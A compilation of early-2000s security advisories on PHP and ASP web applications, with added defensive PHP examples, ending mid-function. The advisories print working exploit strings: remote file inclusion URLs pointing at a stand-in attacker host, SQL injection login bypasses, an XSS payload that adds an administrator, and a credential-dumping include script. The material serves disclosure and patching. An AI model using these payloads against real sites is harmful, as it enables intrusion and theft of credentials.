include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
-

admin/modules/comment.php :
-
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
-

...


Exploits :
°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php


...

Patch :
°°°
http://www.phpsecure.org

More details :
°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools

frog-m@n





Immobilier 1 (PHP)

2002-11-26 Thread Frog Man







Information :
°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection

PHP Code/Location :
°°°
agentadmin.php :
--
[...]
} elseif ($agentname != "" OR $current_user != "")
	{
	$sql = "SELECT id FROM agents WHERE agent='$agentname' and 
agentpass='$agentpassword'";
	$result = mysql_query($sql) or die("Couldn't execute query.");
	$num = mysql_numrows($result);
	if ($num == 1) {
		session_register("agentname");
		session_register("agentpassword");
		[...]
		session_register("current_user");
		session_register("agent");
[...]
--


admin/phpinfo.php :
---
<?
phpinfo();
?>
---

Exploits :
°°
http://[target]/agentadmin.php?agentname='%20OR%20''='agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]agentpasword='%20OR%20''='

http://[target]/admin/phpinfo.php

Solutions :
°°°
- Delete /admin/phpinfo.php
- Put these lines :
--
$agentname=addslashes($agentname);
$currentuser=addslashes($currentuser);
$agentpassword=addslashes($agentpassword);
--
into common.php.
A patch can be found on http://www.phpsecure.org.


More details :
°°
In French :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII


frog-m@n
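Added example (editor's note; not code from PHP-Nuke, UPB, E-theni or Immobilier). The PHP-Nuke post above describes guarding included-only files with an eregi() test on $PHP_SELF, and the UPB reply and the phpinfo.php entries show what direct access to a file can print. The script below shows the two defences a maintainer would apply instead: a constant that only the entry point defines, and error output that goes to the log rather than to the visitor. The constant name IN_APP, the module written to the temp directory and the missing include path are assumptions made for this demonstration.

```php
<?php
// Added example; not code from PHP-Nuke, UPB, E-theni or Immobilier. Two
// defences for the path-disclosure and phpinfo() issues in those posts:
// (1) a file meant to be included only by an entry point refuses a direct
//     request by testing a constant that only the entry point defines, instead
//     of matching the request path with eregi() as PHP-Nuke does;
// (2) PHP warnings are logged, not displayed, so a failed include or an
//     undefined function no longer prints the document root to the visitor.
// The constant name IN_APP, the file written to the temp directory and the
// missing include path are assumptions made for the demonstration.

declare(strict_types=1);

// Production error settings (normally php.ini; ini_set() here so the script is self-contained).
ini_set('display_errors', '0');    // never echo warnings, which carry file paths, to the client
ini_set('log_errors', '1');        // keep them for the operator
ini_set('html_errors', '0');

// Handler that records the detail server-side and suppresses PHP's own output.
set_error_handler(function (int $no, string $msg, string $file, int $line): bool {
    error_log(sprintf('[app] %s in %s:%d', $msg, $file, $line));
    return true;
});

// --- constructed demonstration: an included-only module written to a temp file ---
$module = tempnam(sys_get_temp_dir(), 'guard');
file_put_contents($module, '<?php
if (!defined("IN_APP")) {          // guard: the entry point alone defines IN_APP
    http_response_code(403);
    exit("Forbidden");             // no Location: redirect loop, no path, no variables
}
return "module body ran";
');

// 1. A direct request to the module: nothing has defined IN_APP, so the guard would answer 403.
printf("direct request: IN_APP defined? %s\n", defined('IN_APP') ? 'yes' : 'no -> 403 Forbidden');

// 2. Through the entry point: define the constant, then include the module.
define('IN_APP', true);
$body = require $module;
echo "via entry point: $body\n";

// 3. A failed include is logged by the handler; the page shows nothing about it.
include '/nonexistent/dir/missing.inc.php';
echo "page output unchanged after the failed include\n";

unlink($module);
```

Step 3 is the situation the UPB reply describes: with display_errors on, a missing include prints the full path of the script to whoever requested it. The phpinfo.php files named in the E-theni and Immobilier posts need no guard at all, only removal, as the Immobilier post already says; phpinfo() output is configuration disclosure by design.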







Web Server Creator - Web Portal 0.1 (PHP)

2002-11-25 Thread Frog Man





Information :
°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :
°°°
news/include/customize.php :
--
<?
$langfile = $l;

include $l;
?>
--

index.php :
---
[...]
if (!$pg) { $pg = "acceuil"; }
[...]
require ($pg.".php");
?>
[...]
---

Exploits :
°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php



Solution :
°°
- Delete bugged lines in news/include/customize.php
- In index.php replace this line :
require ($pg.".php");
by :
---
if (file_exists($pg.".php")){
require ($pg.".php");
}
---

A patch can be found on http://www.phpsecure.org.


More details :
°°
In French :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII



frog-m@n






dobermann FORUM (php)

2002-10-28 Thread Frog Man
Information :
°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file

PHP Code/location :
°°°
entete.php
enteteacceuil.php
topic/entete.php :
--
<?php include $subpath."banniere.php"; ?>
--

index.php
newtopic.php :

require "config.php";
include("entete.php");


Exploits :
°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php

Patch :
°°°
In files :
--
entete.php
enteteacceuil.php
topic/entete.php
--
replace the line :
--
<?php include $subpath."banniere.php"; ?>
--
by :
--
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
include $banfile; }
?>
--



More details in French :
http://www.frog-man.org/tutos/dobermannFORUM.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n









gBook

2002-10-22 Thread Frog Man

Information :
°°
Language : PHP
Tested version : 1.4
Problem : Admin access

PHP Code :
°°
/gb/index.php :
--
<?php
include("config.inc.php");
if($action == "login") {
	if($user == $loginu && $pw == $loginpw)
	{
		setcookie("login", true, time()+3600);
		header("location: index.php");
	}
	else
	{
		setcookie("login", false, -3600);
		header("location: index.php?fehler=login");
	}
}
?>
[...]
<?php
if($login == true)
{
[ADMIN CODE]
[...]
--

Exploit :
°
http://[Target]/gb/index.php?login=true

Patch :
°°°
Use .htaccess.

More details in French :
http://www.frog-man.org/tutos/gBook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII

frog-m@n
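Added example (editor's note; not code from SPGpartenaires, MyPHPLinks, Thatware, Immobilier or gBook). Those posts share two weaknesses: a login query built by string concatenation, which the suggested addslashes() patches only partially address, and a "logged in" state that the client controls (a cookie carrying id||password, a base64 user:id:pass value, or a $login variable that register_globals lets the query string set). The PHP below shows the replacement a maintainer would write today: a prepared statement, password hashes, and authorisation that reads server-side session state only. The table and column names are hypothetical, and the users, the injection string and the in-memory SQLite database are constructed for the demonstration (the pdo_sqlite extension is assumed).

```php
<?php
// Added example; not code from SPGpartenaires, MyPHPLinks, Thatware, Immobilier
// or gBook. It replaces the string-built login query (with or without
// addslashes()) by a prepared statement, verifies a password hash instead of
// comparing a stored cleartext password, and keeps the "logged in" state on
// the server instead of in a cookie holding id||password or a variable such
// as $login that register_globals lets a request set. Table and column names
// are hypothetical; the users and the SQLite in-memory database are constructed
// for the demonstration (needs the pdo_sqlite extension).

declare(strict_types=1);

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, login TEXT UNIQUE,
                                     pass_hash TEXT, is_admin INTEGER)');
    $ins = $db->prepare('INSERT INTO members (login, pass_hash, is_admin) VALUES (?, ?, ?)');
    $ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT), 1]);
    $ins->execute(['bob',   password_hash('hunter2',       PASSWORD_DEFAULT), 0]);
    return $db;
}

/** Returns the member row on success, null on failure. The login is bound, never concatenated. */
function authenticate(PDO $db, string $login, string $password): ?array
{
    $stmt = $db->prepare('SELECT id, login, pass_hash, is_admin FROM members WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass_hash'])) {
        return null;
    }
    unset($row['pass_hash']);
    return $row;
}

/** $session stands in for $_SESSION: state that only the server writes. */
function login_session(array &$session, array $member): void
{
    $session = ['uid' => (int) $member['id'], 'is_admin' => (bool) $member['is_admin']];
}

/** Authorisation reads the session only; $_GET, $_COOKIE and globals are never consulted. */
function is_admin(array $session): bool
{
    return ($session['is_admin'] ?? false) === true;
}

// --- constructed demonstration ---
$db = open_demo_db();
$session = [];

$attempts = [
    ['alice',     'correct horse'],   // valid credentials
    ['alice',     'wrong'],           // wrong password
    ["' OR ''='", "' OR ''='"],       // the injection string from the posts above: bound as data, matches no login
];
foreach ($attempts as [$login, $password]) {
    $member = authenticate($db, $login, $password);
    printf("%-12s -> %s\n", $login, $member === null ? 'denied' : 'ok, uid ' . $member['id']);
    if ($member !== null) {
        login_session($session, $member);
    }
}

// A request variable named like the session key grants nothing: is_admin() never looks at it.
$_GET['login'] = 'true';
$_GET['is_admin'] = '1';
var_dump(is_admin($session));   // bool(true): alice authenticated above
var_dump(is_admin([]));         // bool(false): a fresh session, whatever the query string says
```

With the credentials bound as parameters, the ' OR ''=' value from the exploits above is compared against the login column as an ordinary string and matches nothing, so no addslashes() call is needed on the way in. Storing only a session identifier on the client also removes the SPGpartenaires pattern of re-authenticating every page from a cookie that carries the password itself.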




phpnewsDev

2002-10-22 Thread Frog Man

Information :
°°
Language : PHP
Tested version : 1
Problem : bad use of include()

PHP Code :
°°
---Include/variables.php3---
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage=2000;
$MoisDeDemarrage=8;
$NbNouvelles=5;
require("$Include/french.inc");
?>
---

and Include/lib.inc.php3 :

include("$Include/config.inc.php3");



Exploits :
°°
http://[target]/variables.php3?Include=http://[attacker]
with in the file http://[attacker]/french.inc :
?
print(centeruMySQL Infos/u/center\n\nServeur: $Mac \nLogin: $Uti 
\nPass: $Mot \nDB Name: $Bd);
?

and

http://[target]/Include/lib.inc.php3?http://[attacker]
with in a bad php code in the file :
http://[attacker]/config.inc.php3


Patch :
°°°
Add to the beginning of :
--
Include/lib.inc.php3
Include/variables.php3
--

the line :
$Include="Include";



More details in French :
http://www.frog-man.org/tutos/phpnewsDev.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII



frog-m@n
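Added example (editor's note; not code from any of the products above). The include-file posts for E-theni, N/X, PEEL, WAnewsletter, Thatware, FreeNews / News Evolution, WSC, dobermann FORUM, phpnewsDev and phpSecurePages all share one pattern, include($request_variable . 'file.php'), and most of the suggested patches add a file_exists() test around it. The PHP below shows the stricter fix a maintainer would apply: the directory is fixed by the application, the request-supplied part is matched against an allowlist, and the resolved path is checked to lie inside the intended directory. The function name, the lang/<code>/lang.php layout and the probe values are assumptions made for this demonstration.

```php
<?php
// Added example; not code from E-theni, N/X, PEEL, WAnewsletter, Thatware,
// FreeNews / News Evolution, WSC, dobermann FORUM, phpnewsDev or phpSecurePages.
// The posts above patch include($request_variable . 'file.php') with a
// file_exists() test. This version goes further: the directory is fixed by the
// application, the request-supplied part is matched against an allowlist, and
// the resolved path is checked to lie inside the intended directory.
// Function names and the lang/<code>/lang.php layout are hypothetical.

declare(strict_types=1);

/**
 * Map a request-supplied language code to the file to include.
 * Returns the canonical absolute path, or null when the request is not acceptable.
 */
function resolve_language_file(string $baseDir, string $lang, array $allowed = ['fr', 'en']): ?string
{
    // 1. Only values the application ships are accepted; "../x", "http://..."
    //    and anything else never reach the filesystem.
    if (!in_array($lang, $allowed, true)) {
        return null;
    }

    // 2. The directory comes from the application, never from the request.
    $candidate = $baseDir . '/lang/' . $lang . '/lang.php';

    // 3. Canonicalise and verify containment. realpath() returns false for a
    //    missing file, which also covers an allowed language that is not installed.
    $real = realpath($candidate);
    $root = realpath($baseDir . '/lang');
    if ($real === false || $root === false) {
        return null;
    }
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;            // resolved outside lang/ (symlink or traversal)
    }
    return $real;
}

// --- constructed demonstration: a throwaway lang/ tree in the temp directory ---
$base = sys_get_temp_dir() . '/include_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/lang/fr', 0700, true);
file_put_contents($base . '/lang/fr/lang.php', "<?php\nreturn ['hello' => 'bonjour'];\n");

$probes = [
    'fr',                       // installed and allowed
    'en',                       // allowed but not installed
    '../admin',                 // traversal attempt
    'http://[attacker]/',       // remote file inclusion attempt, as in the posts above
];
foreach ($probes as $lang) {
    $path = resolve_language_file($base, $lang);
    printf("%-22s -> %s\n", var_export($lang, true), $path === null ? 'rejected' : 'include ' . $path);
}

$path = resolve_language_file($base, 'fr');
if ($path !== null) {
    $strings = require $path;   // the only include in the script uses the checked path
    echo $strings['hello'], "\n";
}

// clean up the throwaway tree
unlink($base . '/lang/fr/lang.php');
rmdir($base . '/lang/fr');
rmdir($base . '/lang');
rmdir($base);
```

file_exists() as used in the patches does reject an http:// value, because the HTTP stream wrapper does not support stat(), but it accepts any local path the request can name; the allowlist removes that. Independently of the code, register_globals=Off stops $rep_include, $c_path, $chemin, $neurl, $subpath and $Include from being populated from the query string in the first place, and allow_url_include=Off (PHP 5.2 and later) stops include() from fetching remote code at all.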











SSGbook (ASP)

2002-10-08 Thread Frog Man

Information :
°°
Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

PHP Code / location :
°
- config.asp --
fString = doCode(fString, [img],[/img],img src=, border=0)
fString = doCode(fString, [image],[/image],img src=, border=0)
fString = doCode(fString, [img=right],[/img=right],img align=right 
src=, id=right border=0)
fString = doCode(fString, [image=right],[/image=right],img align=right 
src=, id=right border=0)
fString = doCode(fString, [img=left],[/img=left],img align=left 
src=, id=left border=0)
fString = doCode(fString, [image=left],[/image=left],img align=left 
src=, id=left border=0)
- config.asp --

Exploit :
°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]


e.g. :
[image]javascript:document.location=ss_admin.asp?Mode=UpdateActon=AccessUserName=PomPassword=turlututu;[/image]

Adds an admin if an admin reads it. Login : Pom, Password : turlututu

Patch :
°°°
In config.asp :
Add this line :

  strOutput = Replace(strOutput, chr(34), "&quot;")

after

--
  strOutput = Replace(strOutput, "<", "&lt;")
  strOutput = Replace(strOutput, ">", "&gt;")
--

And replace these lines :



fString = doCode(fString, [img],[/img],img src=, border=0)
fString = doCode(fString, [image],[/image],img src=, 
border=0)
fString = doCode(fString, [img=right],[/img=right],img align=right 
src=, id=right border=0)
fString = doCode(fString, [image=right],[/image=right],img 
align=right src=, id=right border=0)
fString = doCode(fString, [img=left],[/img=left],img align=left 
src=, id=left border=0)
fString = doCode(fString, [image=left],[/image=left],img align=left 
src=, id=left border=0)



by :


fString = doCode(fString, "[img]http://", "[/img]", "<img src=""http://", """ border=0>")
fString = doCode(fString, "[image]http://", "[/image]", "<img src=""http://", """ border=0>")
fString = doCode(fString, "[img=right]http://", "[/img=right]", "<img align=right src=""http://", """ id=right border=0>")
fString = doCode(fString, "[image=right]http://", "[/image=right]", "<img align=right src=""http://", """ id=right border=0>")
fString = doCode(fString, "[img=left]http://", "[/img=left]", "<img align=left src=""http://", """ id=left border=0>")
fString = doCode(fString, "[image=left]http://", "[/image=left]", "<img align=left src=""http://", """ id=left border=0>")


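The patch above closes the hole in two steps: quotes are encoded before the BBCode pass, so the attribute cannot be terminated early, and the replacement only fires when the tag body starts with "http://", so a javascript: URL never becomes an img src. The following PHP is an added example written for this page (not SSGbook's code, which is ASP); it makes the same two decisions explicit with a scheme allowlist (http and https, one step further than the patch) and attribute encoding. The function names and the [img]/[image] syntax handled are assumptions chosen to mirror the tags on the page.

```php
<?php
// Added example, not SSGbook's code: a BBCode [img] converter that only
// accepts http/https URLs and HTML-encodes the value before it becomes an
// attribute. Mirrors the patch above: quotes are encoded first, and a tag
// whose body is not an http(s) URL is left as plain text.

// Encode everything first, as config.asp does with < > and chr(34).
function encode_output(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// True only for absolute http(s) URLs; javascript:, vbscript:, data: and
// protocol-relative values all fail this check.
function is_safe_img_url(string $url): bool
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true);
}

// Convert [img]...[/img], [img=left]...[/img=left], [img=right]...[/img=right]
// and the [image] spellings into <img> tags. The input is already encoded,
// so a literal quote inside the URL arrives as &quot; and stays in the attribute.
function bbcode_img(string $encoded): string
{
    $pattern = '#\[(img|image)(?:=(left|right))?\](.*?)\[/\1(?:=\2)?\]#is';
    return preg_replace_callback($pattern, function (array $m): string {
        $align = $m[2];
        // Decode before checking, so an entity-encoded scheme is seen as what
        // the browser would see; re-encode when writing it back out.
        $url = html_entity_decode($m[3], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        if (!is_safe_img_url($url)) {
            return $m[0];   // not an http(s) URL: keep the tag as visible text
        }
        $attrs = $align !== '' ? ' align="' . $align . '"' : '';
        return '<img' . $attrs . ' src="' . encode_output($url) . '" border="0">';
    }, $encoded);
}

// Order matters: encode the raw post first, then apply the BBCode pass.
function render_message(string $raw): string
{
    return bbcode_img(encode_output($raw));
}
```

With this, `[image]javascript:{SCRIPT}[/image]` is rendered literally, `[img]http://host/a.png[/img]` becomes an img tag, and a URL containing a double quote cannot end the src attribute because it is written out as `&quot;`.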



More details in french :
http://www.frog-man.org/tutos/SSGbook.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n


_
Chat online with your friends! http://messenger.msn.fr




phpSecurePages Killer Protection ( PHP )

2002-10-07 Thread Frog Man

1)
Informations :
°°
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file

PHP Code :
°°
-- checklogin.php -
if (!$login) {
// no login available
include($cfgProgDir . "interface.php");
exit;
}
if (!$password) {
// no password available
$message = $strNoPassword;
include($cfgProgDir . "interface.php");
exit;
}
-- checklogin.php --

Exploit :
°
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/login=1
with
http://[attacker]/interface.php .

Patch :
°°°
Add this :
$cfgProgDir =  './';
at the beginning of checklogin.php .

More details in french :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools




2)
Informations :
°°
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Information disclosure

Exploit :
°
http://[target]/vars.inc
and
http://[target]/protection.php?mode=displayusername=[LOGIN]password=[PASSWORD]

Patch :
°°°
rename vars.inc to vars.inc.php .
In protection.php, replace
require("vars2.inc");
by
require("vars2.inc.php");


More details in french :
http://www.frog-man.org/tutos/KillerProtection.txt

translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools




frog-m@n






phpMyNewsletter

2002-10-03 Thread Frog Man

Informations :
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°
 /include/customize.php 
<?php
$langfile = $l;

include $l;
?>
 /include/customize.php 


Exploit :
°
http://[target]/include/customize.php?l=http://[attacker]/code.txttext=Hello%20World
With in http://[attacker]/code.txt :
<?php echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view


Patch :
°°°
The author has been alerted and the latest version (0.7beta1) has been patched.


More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n






Multiple Web Security Holes

2002-10-02 Thread Frog Man

I sent this three times to webappsec but without results.
So I am trying bugtraq, although that is less appropriate.


-
Five products in PHP are vulnerable to various holes.

1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : DB information disclosure
Exploit :
<?php
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database");
?>

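Both TightAuction (config.inc fetched as text) and Killer Protection (vars.inc) above share one cause: settings live in a file the web server serves verbatim instead of executing. The advisory's fix is to rename the file to .php; the following is an added example (not code from either product) showing that rename together with the usual companion guard, so that even the .php file prints nothing when requested directly. APP_ENTRY and the placeholder credentials are assumptions for illustration.

```php
<?php
// Added example, not TightAuction's or Killer Protection's code.
// Two files are shown; split them at the markers when saving.

// --- config.inc.php ---------------------------------------------------
// A .php extension means the server runs the file instead of serving it.
// The guard makes a direct request for /config.inc.php return nothing.
if (!defined('APP_ENTRY')) {
    http_response_code(404);
    exit;                       // nothing below is ever sent to the client
}
$DB_Username = 'dbuser';        // constructed placeholder values
$DB_Password = 'dbpass';
$DB_Database = 'localhost';

// --- index.php (entry script) -----------------------------------------
// The constant is defined in code, before the require, never from input.
define('APP_ENTRY', true);
require __DIR__ . '/config.inc.php';
// $DB_Username etc. are now available to this script only.
```

Keeping the configuration outside the document root altogether is stronger still, since then no URL maps to the file at all; the guard is the fallback for installations where that is not possible.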

2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts
Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]

Problem :
<?php
if ($pymembs)
{
$login=$pymembs;
session_start();
session_register('login');
}
else { session_start(); }
[...]
if(!session_is_registered('login'))
{
?>
[...]

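The PY-Membres code above registers whatever arrives in the pymembs variable as the session login, so the check that follows passes for any name. An added example (not PY-Membres' code) of the pattern that avoids this: the session value is written only after a password check, and only from data the server verified. The user table and field names are constructed for the example.

```php
<?php
// Added example, not PY-Membres' code: the session is marked as logged in
// only after password verification, so a request parameter such as
// ?pymembs=admin cannot produce an authenticated session.

session_start();

// Constructed user table holding password hashes, never plaintext.
$USERS = [
    'admin' => password_hash('example-admin-pass', PASSWORD_DEFAULT),
];

function attempt_login(array $users, string $login, string $password): bool
{
    if (!isset($users[$login]) || !password_verify($password, $users[$login])) {
        return false;
    }
    session_regenerate_id(true);     // fresh id on privilege change
    $_SESSION['login'] = $login;     // the only place this key is set
    return true;
}

function current_user(): ?string
{
    return $_SESSION['login'] ?? null;
}

// Only POSTed credentials are considered; nothing from the query string can
// populate $_SESSION['login'] (the page's code did $login = $pymembs).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ok = attempt_login(
        $USERS,
        (string)($_POST['login'] ?? ''),
        (string)($_POST['password'] ?? '')
    );
    if (!$ok) {
        http_response_code(401);
        exit('bad credentials');
    }
}

if (current_user() === null) {
    http_response_code(403);
    exit('login required');
}
// Protected content follows.
```

The contrast with the vulnerable snippet is the source of the value: the page's code copies a request variable into the session, this version copies a name only after verifying a secret tied to it.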
3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : Information disclosure
Exploit :
http://[target]/db/users.dat

4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : Information disclosure, Upload
Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php

5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : Include file
Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with
http://[attacker]/main_location.inc
or
http://[attacker]/config.inc.php3
or
http://[attacker]/get_userdata.php3

Problem :
if (!isset($rel_path)) $rel_path="";
include $rel_path."config.inc.php3";
include $rel_path."get_userdata.php3";

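phpSecurePages ($cfgProgDir), phpMyNewsletter ($l) and Pphlogger ($rel_path) above all build an include path from a variable that register_globals lets the request set, so a URL to a host the attacker controls is accepted as the include source. The phpSecurePages patch fixes the directory in code; the following added example (not code from any of the three projects) does the same and adds a resolution check for the case where the file name itself is user-selectable. The function names and the ".php" name rule are assumptions for the example.

```php
<?php
// Added example, not from phpSecurePages, phpMyNewsletter or Pphlogger:
// the include directory is fixed in code, and a caller-chosen file name is
// accepted only if it is a plain name that resolves inside that directory.

define('APP_DIR', __DIR__);   // fixed base; never taken from the request

function resolve_include(string $name, string $base = APP_DIR): ?string
{
    // Reject URLs ("http://[attacker]/"), traversal ("../path") and anything
    // that is not a simple file name ending in .php.
    if (!preg_match('#\A[A-Za-z0-9_.-]+\.php\z#', $name)) {
        return null;
    }
    $real     = realpath($base . DIRECTORY_SEPARATOR . $name);
    $baseReal = realpath($base);
    if ($real === false || $baseReal === false) {
        return null;   // file does not exist
    }
    // realpath() has collapsed any "..", so a prefix comparison is reliable.
    if (strncmp($real, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Equivalent of include($cfgProgDir . "interface.php") with the directory
// no longer under request control.
function load_page(string $which): void
{
    $file = resolve_include($which);
    if ($file === null) {
        http_response_code(400);
        exit('invalid page');
    }
    include $file;
}

// Example call: the request may choose the page, never the directory.
load_page((string)($_GET['page'] ?? 'interface.php'));
```

Where the included file is never meant to vary, as with checklogin.php, the one-line patch on the page is the whole fix: assign $cfgProgDir before any use. The resolver above is for the phpMyNewsletter case, where the name of the file is legitimately part of the request.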


For more details & patches :
In french :
http://www.frog-man.org/tutos/5holes10.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII

-

Sorry for my poor English.
frog-m@n







MySimpleNews (PHP)

2002-10-02 Thread Frog Man

Informations :
°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.


a) Writing PHP code in a PHP file and execution of this code.
Problem :
°
- users.php -
<?php
$fp=fopen("news.php3","a");
fwrite($fp,"Posté Par [$LOGIN]\n");
fwrite($fp,"Le $DATA\n<br>");
fwrite($fp,"$MESS\n<hr>");
fclose($fp);
?>
- users.php -

Exploit :
°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3

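The users.php snippet appends the three request variables into news.php3, a file PHP will later parse, so any PHP tags in LOGIN, DATA or MESS run on the next visit. An added example (not MySimpleNews' code) of storing the same three fields as data rather than source: entries go into a non-executable file and are HTML-encoded at render time. The file name and JSON-lines layout are assumptions for the example.

```php
<?php
// Added example, not MySimpleNews' code: posts are stored as data in a file
// the server never executes, and encoded on output, so "[PHP code]" in
// LOGIN, DATA or MESS is displayed as text instead of run.

define('NEWS_FILE', __DIR__ . '/news.jsonl');   // not .php/.php3

function add_news(string $login, string $date, string $message): void
{
    $entry = ['login' => $login, 'date' => $date, 'message' => $message];
    $line  = json_encode($entry, JSON_UNESCAPED_UNICODE) . "\n";
    file_put_contents(NEWS_FILE, $line, FILE_APPEND | LOCK_EX);
}

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Same layout as the original (author, date, message, <hr>), but every
// field passes through h() and none is ever interpolated into PHP source.
function render_news(): string
{
    if (!is_file(NEWS_FILE)) {
        return '';
    }
    $out = '';
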